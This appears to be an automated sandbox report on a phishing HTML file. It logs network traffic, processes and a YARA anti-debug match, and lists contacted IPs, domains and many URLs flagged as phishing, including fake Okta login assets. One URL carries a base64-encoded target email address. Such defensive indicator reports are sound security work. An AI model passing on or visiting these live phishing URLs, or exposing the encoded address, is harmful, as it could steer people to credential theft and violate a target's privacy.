cfL4;desc="?proto=TCP&rtt=25562&min_rtt=25552&rtt_var=9602&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2068&delivery_rate=111111&cwnd=32&unsent_bytes=0&cid=f8e3b3bd6f9ca9b4&ts=209&x=0"CF-RAY: 9220c461180433d5-EWRalt-svc: h3=":443"; ma=86400

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.68:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.148.69:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.33.187.96:443 -> 192.168.2.16:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.51.122:443 -> 192.168.2.16:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.46:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49832 version: TLS 1.2

Creates files inside the system directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir6908_227045112

Deletes files inside the Windows folder

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir6908_227045112

Source: classification engine

Classification label: mal100.phis.evad.winHTML@20/33@49/232

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\suspect.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,9613019893938489976,16158350470171388402,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1892,i,9613019893938489976,16158350470171388402,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Data Obfuscation

HTML file submission requesting Cloudflare captcha challenge

Source: https://3pz.bughtswo.com/admi/#YnJhZC5nYWxlQHdpbHNvbnNhZHZpc29yeS5jb20uYXU=

HTTP Parser: https://3pz.bughtswo.com/admi/#YnJhZC5nYWxlQHdpbHNvbnNhZHZpc29yeS5jb20uYXU=

Malware Analysis System Evasion

Yara detected AntiDebug via timestamp check

Source: Yara match	File source: 0.2.d.script.csv, type: HTML
Source: Yara match	File source: 1.11..script.csv, type: HTML
Source: Yara match	File source: 1.12..script.csv, type: HTML
Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 2.22.d.script.csv, type: HTML
Source: Yara match	File source: 3.29..script.csv, type: HTML
Source: Yara match	File source: 3.30..script.csv, type: HTML
Source: Yara match	File source: 3.9.pages.csv, type: HTML

Screenshots

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.180.46	rxivb5.qakaco.ru	United States	13335	CLOUDFLARENETUS	false
173.194.76.84	unknown	United States	15169	GOOGLEUS	false
142.250.185.142	unknown	United States	15169	GOOGLEUS	false
172.67.148.69	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.186.131	unknown	United States	15169	GOOGLEUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.16.2.189	developers.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.186.138	unknown	United States	15169	GOOGLEUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.185.68	www.google.com	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
172.217.16.206	unknown	United States	15169	GOOGLEUS	false
13.33.187.68	d19d360lklgih4.cloudfront.net	United States	16509	AMAZON-02US	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
104.21.51.122	r7hi.qakaco.ru	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	3pz.bughtswo.com	European Union	13335	CLOUDFLARENETUS	true
13.33.187.96	unknown	United States	16509	AMAZON-02US	false
172.67.70.233	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.186.142	unknown	United States	15169	GOOGLEUS	false
185.199.108.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
216.58.212.163	unknown	United States	15169	GOOGLEUS	false
172.217.16.195	unknown	United States	15169	GOOGLEUS	false
104.26.0.100	get.geojs.io	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16
192.168.2.23

Contacted Domains

Name	IP	Active
a.nel.cloudflare.com	35.190.80.1	true
developers.cloudflare.com	104.16.2.189	true
github.com	140.82.121.4	true
3pz.bughtswo.com	188.114.97.3	true
rxivb5.qakaco.ru	172.67.180.46	true
code.jquery.com	151.101.194.137	true
r7hi.qakaco.ru	104.21.51.122	true
cdnjs.cloudflare.com	104.17.24.14	true
challenges.cloudflare.com	104.18.95.41	true
get.geojs.io	104.26.0.100	true
www.google.com	142.250.185.68	true
d19d360lklgih4.cloudfront.net	13.33.187.68	true
objects.githubusercontent.com	185.199.108.133	true
y0wwlcczroc2mikkx8azepa6tnnyjj1ifs5xawhcmienblrzuz6qcrs.sorenxw.es	unknown	unknown
ok4static.oktacdn.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://3pz.bughtswo.com/56mQ3hNU0OeLFsBE0cdBYhj76720	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/opBd8RIsQEhweDF79MfJTmO32LcCxDbe4QgnBMPgPPghFozKdpmUpA5eLxsl9zJJ0KlUUZOyAEef196	true	Avira URL Cloud: phishing	unknown
https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7	false		high
https://3pz.bughtswo.com/xyYqDiOE9Wrs7igh30	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/favicon.ico	true	Avira URL Cloud: phishing	unknown
https://code.jquery.com/jquery-3.6.0.min.js	false		high
https://3pz.bughtswo.com/klSe5FeF4V4B9AsN4kzckt7xcRfhr56nJ41v2BUS7L5ZHUtaQLGpmLSV8ukuv220	true	Avira URL Cloud: phishing	unknown
https://a.nel.cloudflare.com/report/v4?s=YOc6l7q5QXOg%2BVGS6GJKA%2F4%2Fb2k5g%2Frv%2BS7f02dvV2lbpZgQwM9U2Vx17pmuN1HwC%2FHZkvhIGBh28VrxfK6%2BFkGVeiPZX8zr7KlBkyNZec09K6pZr965vAQlSeM%2B	false	Avira URL Cloud: safe	unknown
https://3pz.bughtswo.com/zc8QtV1AgOx9d4g80BylSMR67CLPWQsWgy	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/GDSherpa-vf2.woff2	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/mnGeMwtuiseg6FuvHXI23EgklvYhJt1DtbpXmd9tZGrz78150	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/GDSherpa-vf.woff2	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/wpE72XVhb4Z1pXQe52oRXxRmo	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/GDSherpa-regular.woff2	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/opuxRiSxTmEM15vBJMb9leXlu5sefNsAugLT2OPWIt7nw45140	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/opCFdSgn1l9ejFMcZdMMdllPgt3wr0qvg5ghQ19r8NjVY4Vg9HKNBQfcd200	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/GDSherpa-bold.woff2	true	Avira URL Cloud: phishing	unknown
https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css	false		high
https://3pz.bughtswo.com/12cgfpYt7Gg84zxyfkj8918	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/klJEJj5AR8FEExIIOG1ZoX9K1rLijUqfl9xv18C2sUweSiWsxciyR4bNuR1awx216	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/qrRKnn6n9eUoC5I00CX7vJefVlhQdgy6RPYvoDRYN1q67140	true	Avira URL Cloud: phishing	unknown
https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js	false		high
https://3pz.bughtswo.com/sfhyazpyvwddcmilfwzwiezbwzfvcgaogmofrlsmehgvokyu6fchdw70og3s1exjhnjhzth?FYUMHQNFQOGWNOVWIZSTJFOWK	true		unknown
https://3pz.bughtswo.com/wxB2I98tBROJelAq0Qq5WjZ6UMxcstFpC8Y9kgRgGII0H34126	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/opwzYslPhX1AtOROVu3V2KXjF2vYFIQTFKpREUQCrAUstQdhMWnYFFGrFe6cfvB6BRzktecd232	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/uheSegtXcJrGcg1LANWjxLwtiG1EYvEeZy6o1u9WZEqq1xsRwxhwODvkp	true	Avira URL Cloud: phishing	unknown
https://r7hi.qakaco.ru/kella$0zphou	false	Avira URL Cloud: safe	unknown
https://3pz.bughtswo.com/GDSherpa-regular.woff	true	Avira URL Cloud: phishing	unknown
https://a.nel.cloudflare.com/report/v4?s=iRRP2hVjA1LeAbtjngxFEN43pYv8QD0IHB0a6pLmqb4BiuIyCUD%2FUUCw5F0GN1mOU1vX5L0DlzZnRLfEs153tGwd0QXScirwYeQSA5yNozHG5kwURMNR28J%2FuUS7	false	Avira URL Cloud: safe	unknown
https://3pz.bughtswo.com/kl3XiVz0aPutz6bSmjR9D2P593BDt6Z4DUWuOyzYQYdRIcPOAJBMuwV98WwDp5V256170	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/admi/	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/GDSherpa-bold.woff	true	Avira URL Cloud: phishing	unknown
https://3pz.bughtswo.com/admi/#YnJhZC5nYWxlQHdpbHNvbnNhZHZpc29yeS5jb20uYXU=	true		unknown
https://3pz.bughtswo.com/uvjJJeKRwvQvI18yo62v8qr2JrPPmCQo5SPbYPPQ12130	true	Avira URL Cloud: phishing	unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	false		high
https://3pz.bughtswo.com/yfuOUwyTI9qASHIO1Yd1WuHEVWTfcFf2n32Nn6H6lWun5L5SxS2l	true	Avira URL Cloud: phishing	unknown
https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css	false		high
